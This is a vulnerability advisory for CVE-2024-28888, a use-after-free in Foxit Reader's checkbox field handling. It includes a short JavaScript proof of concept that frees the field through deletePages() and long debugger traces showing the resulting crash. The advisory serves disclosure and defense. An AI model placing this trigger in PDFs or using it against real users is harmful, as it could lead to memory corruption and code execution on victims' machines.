CVE-2024-28888
A use-after-free vulnerability exists in the way Foxit Reade 2024.1.0.23997 handles a checkbox field object. A specially crafted Javascript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Foxit Reader 2024.1.0.23997
Foxit Reader - https://www.foxitsoftware.com/pdf-reader/
8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-416 - Use After Free
Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.
Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles a checkbox field object. This can be illustrated by the following proof-of-concept code:
function main() {
var aa = app.activeDocs[0].addField("ADD", "checkbox", 2, [17,0,5,14] ).defaultIsChecked(0);
getField("txt3").setAction("Calculate",'delete_pages();');
app.activeDocs[0].addField("ADD", "checkbox", 0, [17,0,5,14] ) ;
}
function delete_pages(arg1, arg2, arg3) {
app.activeDocs[0].deletePages();
app.activeDocs[0].deletePages();
}
The above code creates a checkbox field object. A callback function is assigned to the TextField object’s Calculate event, which is promptly triggered by the second call to addField. In the action callback, all that happens is a call to deletePages, which in turn ends up freeing all the objects associated with a page. The use-after-free vulnerability occurs when a checkbox field object is freed by deletePages() and it is used without any validation. We can observe the following in the debugger (with PageHeap enabled):
eax=076fe070 ebx=076fe0dc ecx=02cc3280 edx=00000002 esi=131c5ae8 edi=160501a8
eip=030956e9 esp=076fe048 ebp=076fe088 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
030956e9 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0x1168450 (02cc3280)}
0:000> g
in javascript::Field::AddField
eax=011397f0 ebx=076fe0dc ecx=1035bbc8 edx=04a78d94 esi=131c5ae8 edi=160501a8
eip=02d6e633 esp=076fddc8 ebp=076fde88 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x1213803:
02d6e633 ffd0 call eax {FoxitPDFReader!CryptUIWizExport+0x30970 (011397f0)}
[...]
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc07 esp=076fdcfc ebp=076fdd50 iopl=0 nv up ei pl nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200203
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506957:
01b0fc07 f30f5cc2 subss xmm0,xmm2
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc0b esp=076fdcfc ebp=076fdd50 iopl=0 nv up ei pl nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200203
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50695b:
01b0fc0b f20f101570463e05 movsd xmm2,mmword ptr [FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::`vbtable'+0x5c574 (053e4670)] ds:002b:053e4670=7fffffffffffffff
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc13 esp=076fdcfc ebp=076fdd50 iopl=0 nv up ei pl nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200203
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506963:
01b0fc13 0f5ac0 cvtps2pd xmm0,xmm0
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc16 esp=076fdcfc ebp=076fdd50 iopl=0 nv up ei pl nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200203
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506966:
01b0fc16 0f54c2 andps xmm0,xmm2
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc19 esp=076fdcfc ebp=076fdd50 iopl=0 nv up ei pl nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200203
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506969:
01b0fc19 660f5ac0 cvtpd2ps xmm0,xmm0
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc1d esp=076fdcfc ebp=076fdd50 iopl=0 nv up ei pl nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200203
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50696d:
01b0fc1d 0f2fc4 comiss xmm0,xmm4
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc20 esp=076fdcfc ebp=076fdd50 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506970:
01b0fc20 0f8237040000 jb FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506dad (01b1005d) [br=0]
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc26 esp=076fdcfc ebp=076fdd50 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506976:
01b0fc26 f30f5ccb subss xmm1,xmm3
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc2a esp=076fdcfc ebp=076fdd50 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50697a:
01b0fc2a 0f5ac1 cvtps2pd xmm0,xmm1
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc2d esp=076fdcfc ebp=076fdd50 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50697d:
01b0fc2d 0f54c2 andps xmm0,xmm2
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc30 esp=076fdcfc ebp=076fdd50 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506980:
01b0fc30 660f5ac0 cvtpd2ps xmm0,xmm0
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc34 esp=076fdcfc ebp=076fdd50 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506984:
01b0fc34 0f2fc4 comiss xmm0,xmm4
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc37 esp=076fdcfc ebp=076fdd50 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506987:
01b0fc37 0f8220040000 jb FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506dad (01b1005d) [br=0]
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=131c5ae8 edi=16426750
eip=01b0fc3d esp=076fdcfc ebp=076fdd50 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x50698d:
01b0fc3d 8b751c mov esi,dword ptr [ebp+1Ch] ss:002b:076fdd6c=00000002
0:000> p
eax=0c8cb610 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=00000002 edi=16426750
eip=01b0fc40 esp=076fdcfc ebp=076fdd50 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506990:
01b0fc40 c745e800000100 mov dword ptr [ebp-18h],10000h ss:002b:076fdd38=076fdd54
0:000> pc
eax=076fdd74 ebx=076fe0dc ecx=0c8cb610 edx=04aee16c esi=00000002 edi=16426750
eip=01b0fc86 esp=076fdcf4 ebp=076fdd50 iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5069d6:
01b0fc86 e8351a3c00 call FoxitPDFReader!safe_vsnprintf+0x376890 (01ed16c0) ;<----------------------------------- (2)
0:000> p
eax=18babf00 ebx=076fe0dc ecx=175db036 edx=00000001 esi=00000002 edi=16426750
eip=01b0fc8b esp=076fdcfc ebp=076fdd50 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5069db:
01b0fc8b 8bf8 mov edi,eax
0:000> dd eax
18babf00 0c8cb610 18bbf0e0 18bbf0b0 00000000
18babf10 00000000 00000000 00000000 00000000
18babf20 00000000 00000000 00000000 00000000
18babf30 00000000 00000000 00000000 00000000
18babf40 00000000 00000000 00000000 00000000
18babf50 00000000 00000000 00000000 00000000
18babf60 00000000 00000000 00000000 00000000
18babf70 00000000 00000000 00000000 00000000
0:000> dd 18bbf0e0 ;<----------------------------------- (3)
18bbf0e0 00000003 00000000 0c8cb610 18bbf0b0
18bbf0f0 00000000 18b92af8 00000001 00000001
18bbf100 00000000 00000004 00000000 00000000
18bbf110 00000000 18bb7c08 18bb7c20 18bb7c38
18bbf120 18bb7c50 18bbe280 18bbe2a0 18bb7c68
18bbf130 18bbe2c0 18bb7c80 18ba1c78 18bbe2e0
18bbf140 18bb7c98 18bb7cb0 18bb7cc8 18bb7ce0
18bbf150 18bb7cf8 18bb7d10 18bb7d28 18bb7d40
At (1) above, javascript::CFXJS_Document::addField_static method associated with the JavaScript API addField() is called. This method eventually calls CPDF_InterForm::CreateControl at (2). The CreateControl method creates the vulnerable buffer. The vulnerable buffer value is examined at (3).
eax=076fe070 ebx=076fe0dc ecx=02cc3280 edx=00000002 esi=10e4c678 edi=10e69e58
eip=030956e9 esp=076fe048 ebp=076fe088 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
030956e9 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0x1168450 (02cc3280)}
0:000> g
eax=011397f0 ebx=076fe0dc ecx=1035bbc8 edx=04a78d94 esi=10e4c678 edi=10e69e58
eip=02d6e633 esp=076fddc8 ebp=076fde88 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x1213803:
02d6e633 ffd0 call eax {FoxitPDFReader!CryptUIWizExport+0x30970 (011397f0)}
0:000> g
eax=009733f0 ebx=076fe0dc ecx=164269c8 edx=075dd000 esi=10e4c678 edi=16426b30
eip=01b0fbad esp=076fdcfc ebp=076fdd50 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5068fd:
01b0fbad ffd0 call eax {FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xf3f40 (009733f0)}
0:000> g
eax=076fd4c8 ebx=076fd534 ecx=02cc4f80 edx=00000002 esi=10e708f0 edi=10e84008
eip=030956e9 esp=076fd4a0 ebp=076fd4e0 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
030956e9 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02cc4f80)}
0:000> g
ModLoad: 6afe0000 6b337000 C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\plugins\PDFAccessibility.fpi
js_calls
eax=076fd4c8 ebx=076fd534 ecx=02cc4f80 edx=00000002 esi=12fbfb60 edi=130764b0
eip=030956e9 esp=076fd4a0 ebp=076fd4e0 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
030956e9 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02cc4f80)} ;<-------------------- (4)
[...]
0:000> g
eax=076fcfe4 ebx=18bbf0b0 ecx=0c8cb610 edx=075dd000 esi=0c8cb610 edi=076fd0d4
eip=01ed21f6 esp=076fcfcc ebp=076fcfdc iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x3773c6:
01ed21f6 e845000000 call FoxitPDFReader!safe_vsnprintf+0x377410 (01ed2240) ;<-------------------- (5)
[...]
0:000> pc
eax=00000000 ebx=18ba1458 ecx=18ba1458 edx=075dd000 esi=1c789aa0 edi=0000000b
eip=01ed2477 esp=076fcf6c ebp=076fcfc4 iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200297
FoxitPDFReader!safe_vsnprintf+0x377647:
01ed2477 e854f2ebff call FoxitPDFReader!safe_vsnprintf+0x2368a0 (01d916d0)
0:000> pc
eax=1c789aa0 ebx=18ba1458 ecx=18ba1458 edx=075dd000 esi=1c789aa0 edi=0000000b
eip=01ed248d esp=076fcf68 ebp=076fcfc4 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x37765d:
01ed248d e80e1aecff call FoxitPDFReader!safe_vsnprintf+0x239070 (01d93ea0)
0:000> pc
eax=1c789aa0 ebx=076fcfe4 ecx=0c8cb674 edx=075dd000 esi=18bbf0e0 edi=0c8cb610
eip=01ed24a7 esp=076fcf6c ebp=076fcfc4 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!safe_vsnprintf+0x377677:
01ed24a7 e8942a2500 call FoxitPDFReader!safe_vsnprintf+0x5ca110 (02124f40)
0:000> pc
eax=18ba9501 ebx=076fcfe4 ecx=18bbf0e0 edx=18ba95bc esi=18bbf0e0 edi=0c8cb610
eip=01ed24b4 esp=076fcf70 ebp=076fcfc4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x377684:
01ed24b4 e8a7f20000 call FoxitPDFReader!safe_vsnprintf+0x386930 (01ee1760)
0:000> p
eax=00000000 ebx=076fcfe4 ecx=175da3b2 edx=075dd000 esi=18bbf0e0 edi=0c8cb610
eip=01ed24b9 esp=076fcf70 ebp=076fcfc4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x377689:
01ed24b9 56 push esi ;<---------------(6)
0:000> p
eax=00000000 ebx=076fcfe4 ecx=175da3b2 edx=075dd000 esi=18bbf0e0 edi=0c8cb610
eip=01ed24ba esp=076fcf6c ebp=076fcfc4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x37768a:
01ed24ba e8e1832400 call FoxitPDFReader!safe_vsnprintf+0x5bfa70 (0211a8a0) ;<----------- (7)
0:000> dd esi ;<----------- (8)
18bbf0e0 00000003 00000000 0c8cb610 1c789aa0
18bbf0f0 00000000 18b92af8 00000000 00000002
18bbf100 00000000 00000004 00000000 00000000
18bbf110 00010006 18bbf0b0 00000000 00000000
18bbf120 00000000 1c7711a0 00000010 00000002
18bbf130 18bb9cbc 18bb9c98 0000000a 18bbe2e0
18bbf140 00010006 18bbf0b0 00000000 00000000
18bbf150 00000000 1c7711e0 00000010 00000001
0:000> p
eax=00000000 ebx=076fcfe4 ecx=175da3be edx=075dd000 esi=18bbf0e0 edi=0c8cb610
eip=01ed24bf esp=076fcf6c ebp=076fcfc4 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!safe_vsnprintf+0x37768f:
01ed24bf 83c404 add esp,4
0:000> dd esi ;<----------- (9)
18bbf0e0 00000000 00000000 0c8cb610 1c789aa0
18bbf0f0 00000000 18b92af8 00000000 00000002
18bbf100 00000000 00000004 00000000 00000000
18bbf110 00010006 18bbf0b0 00000000 00000000
18bbf120 00000000 1c7711a0 00000010 00000002
18bbf130 18bb9cbc 18bb9c98 0000000a 18bbe2e0
18bbf140 00010006 18bbf0b0 00000000 00000000
18bbf150 00000000 1c7711e0 00000010 00000001
At [4] above, the javascript::CFXJS_Document::deletePages_static method associated with the JavaScript API deletePages() is called. It calls CPDF_InterForm::DeleteField at (5). The DeleteField calls CFX_Object::operator_delete at [7] on the vulnerable buffer. At [6] , the operator_delete method argument being pushed onto the stack and it comes from the register esi. The value of the vulnerable object is examined at [8] and [9]. It shows the value before and after the operator_delete method is called. Note that, the Foxit application uses a custom allocator so the page heap is not able to mark the vulnerable buffer page. The vulnerable object is later used without any validation. This can be observed in a debugger at the time of the crash:
0:000> p
eax=ffffffff ebx=076fe0dc ecx=175db032 edx=075dd000 esi=00000001 edi=1c777df0
eip=01b1001f esp=076fdcf8 ebp=076fdd50 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506d6f:
01b1001f 8b4dcc mov ecx,dword ptr [ebp-34h] ss:002b:076fdd1c=18bbf0e0
0:000> p
eax=ffffffff ebx=076fe0dc ecx=18bbf0e0 edx=075dd000 esi=00000001 edi=1c777df0
eip=01b10022 esp=076fdcf8 ebp=076fdd50 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506d72:
01b10022 e849573d00 call FoxitPDFReader!safe_vsnprintf+0x38a940 (01ee5770)
0:000> dd ecx <------------------------ (10)
18bbf0e0 00000000 0000001f 0000001f 62626952
18bbf0f0 435f6e6f 67657461 5f79726f 74736f50
18bbf100 6e616353 6974704f 00736e6f 00000000
18bbf110 00010006 18bbf0b0 00000000 00000000
18bbf120 00000000 1c7711a0 00000010 00000002
18bbf130 18bb9cbc 18bb9c98 0000000a 18bbe2e0
18bbf140 00010006 18bbf0b0 00000000 00000000
18bbf150 00000000 1c7711e0 00000010 00000001
0:000> db ecx L28
18bbf0e0 00 00 00 00 1f 00 00 00-1f 00 00 00 52 69 62 62 ............Ribb
18bbf0f0 6f 6e 5f 43 61 74 65 67-6f 72 79 5f 50 6f 73 74 on_Category_Post
18bbf100 53 63 61 6e 4f 70 74 69 ScanOpti
0:000> t
eax=ffffffff ebx=076fe0dc ecx=18bbf0e0 edx=075dd000 esi=00000001 edi=1c777df0
eip=01ee5770 esp=076fdcf4 ebp=076fdd50 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!safe_vsnprintf+0x38a940:
01ee5770 55 push ebp
0:000> pc
eax=ffffffff ebx=076fe0dc ecx=18bbf0e0 edx=075dd000 esi=18bbf0e0 edi=00000000
eip=01ee5785 esp=076fdcd4 ebp=076fdcf0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x38a955:
01ee5785 e8567cffff call FoxitPDFReader!safe_vsnprintf+0x3825b0 (01edd3e0)
0:000> t
eax=ffffffff ebx=076fe0dc ecx=18bbf0e0 edx=075dd000 esi=18bbf0e0 edi=00000000
eip=01edd3e0 esp=076fdcd0 ebp=076fdcf0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x3825b0:
01edd3e0 55 push ebp
0:000> pc
eax=076fdcc4 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01edd431 esp=076fdcb4 ebp=076fdccc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x382601:
01edd431 e8da42ebff call FoxitPDFReader!safe_vsnprintf+0x2368e0 (01d91710)
0:000> t
eax=076fdcc4 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91710 esp=076fdcb0 ebp=076fdccc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368e0:
01d91710 55 push ebp
0:000> p
eax=076fdcc4 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91711 esp=076fdcac ebp=076fdccc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368e1:
01d91711 8bec mov ebp,esp
0:000> p
eax=076fdcc4 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91713 esp=076fdcac ebp=076fdcac iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368e3:
01d91713 51 push ecx
0:000> p
eax=076fdcc4 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91714 esp=076fdca8 ebp=076fdcac iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368e4:
01d91714 8d45fc lea eax,[ebp-4]
0:000> p
eax=076fdca8 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91717 esp=076fdca8 ebp=076fdcac iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368e7:
01d91717 c745fc00000000 mov dword ptr [ebp-4],0 ss:002b:076fdca8=62626952
0:000> p
eax=076fdca8 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d9171e esp=076fdca8 ebp=076fdcac iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368ee:
01d9171e 50 push eax
0:000> p
eax=076fdca8 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d9171f esp=076fdca4 ebp=076fdcac iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368ef:
01d9171f ff7508 push dword ptr [ebp+8] ss:002b:076fdcb4=076fdcc4
0:000> p
eax=076fdca8 ebx=00000000 ecx=62626952 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91722 esp=076fdca0 ebp=076fdcac iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368f2:
01d91722 83c110 add ecx,10h
0:000> p
eax=076fdca8 ebx=00000000 ecx=62626962 edx=0539e639 esi=0539e638 edi=62626952
eip=01d91725 esp=076fdca0 ebp=076fdcac iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x2368f5:
01d91725 e8d6343900 call FoxitPDFReader!safe_vsnprintf+0x5c9dd0 (02124c00) ;<----------------- (11)
0:000> p
(21e8.21f4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000008e0 ebx=00000000 ecx=00000066 edx=00000000 esi=62626962 edi=076fdcc4
eip=02124612 esp=076fdc7c ebp=076fdc84 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
FoxitPDFReader!safe_vsnprintf+0x5c97e2:
02124612 f77608 div eax,dword ptr [esi+8] ds:002b:6262696a=???????? ;<----------------- (12)
0:000> u
FoxitPDFReader!safe_vsnprintf+0x5c97e2:
02124612 f77608 div eax,dword ptr [esi+8]
02124615 8b450c mov eax,dword ptr [ebp+0Ch]
02124618 8910 mov dword ptr [eax],edx
0212461a 8b7604 mov esi,dword ptr [esi+4]
0212461d 85f6 test esi,esi
0212461f 7422 je FoxitPDFReader!safe_vsnprintf+0x5c9813 (02124643)
02124621 8b3496 mov esi,dword ptr [esi+edx*4]
02124624 85f6 test esi,esi
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 076fdc84 02124c10 076fdcc4 076fdc94 62626962 FoxitPDFReader!safe_vsnprintf+0x5c97e2
01 076fdc98 01d9172a 076fdcc4 076fdca8 00000000 FoxitPDFReader!safe_vsnprintf+0x5c9de0
02 076fdcac 01edd436 076fdcc4 18bbf0e0 00000000 FoxitPDFReader!safe_vsnprintf+0x2368fa
03 076fdccc 01ee578a 62626952 0539e638 00000000 FoxitPDFReader!safe_vsnprintf+0x382606
04 076fdcf0 01b10027 00000000 175db18a 16426b30 FoxitPDFReader!safe_vsnprintf+0x38a95a
05 076fdd50 0113e5ce 076fdc01 40a00000 41880000 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506d77
06 076fdd9c 02d6eb05 076fdd74 40a00000 41880000 FoxitPDFReader!CryptUIWizExport+0x3574e
07 076fde88 02d0f51a 1035bbc8 00000000 00000002 FoxitPDFReader!safe_vsnprintf+0x1213cd5
08 076fdfa0 02cc3529 10e69e58 076fe068 076fdfe8 FoxitPDFReader!safe_vsnprintf+0x11b46ea
09 076fe040 030956eb 10e69e58 076fe070 076fe068 FoxitPDFReader!safe_vsnprintf+0x11686f9
0a 076fe088 03279a6b 15bb20a0 18a69525 15bb20a0 FoxitPDFReader!FXJSE_GetClass+0x26b
0b 076fe0f0 0327922e 076fe138 18a69525 076fe210 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3cab
0c 076fe184 032794e5 076fe1b4 15bb20a0 076fe210 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e346e
0d 076fe1cc 0327936b 076fe1e4 00000009 076fe22c FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3725
0e 076fe1e8 0349b17b 00000009 076fe22c 15bb20a0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e35ab
0f 076fe204 034371d9 292c2339 3d252161 00000012 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4053bb
10 076fe25c 034371d9 18a7eb6d 3d251e0d 3d251e61 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
11 076fe288 03435860 18a7eb6d 292c21b1 3d251e0d FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
12 076fe2a0 03435689 00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39faa0
13 076fe2cc 030d1f4e 15bb20a0 292c2339 3d251e0d FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39f8c9
14 076fe3dc 030d1a42 076fe570 15bb20a0 076fe438 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c18e
15 076fe464 030ba744 076fe570 15bb20a0 15b8b5e4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bc82
16 076fe614 030ba240 076fe6b0 15b8b60c 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24984
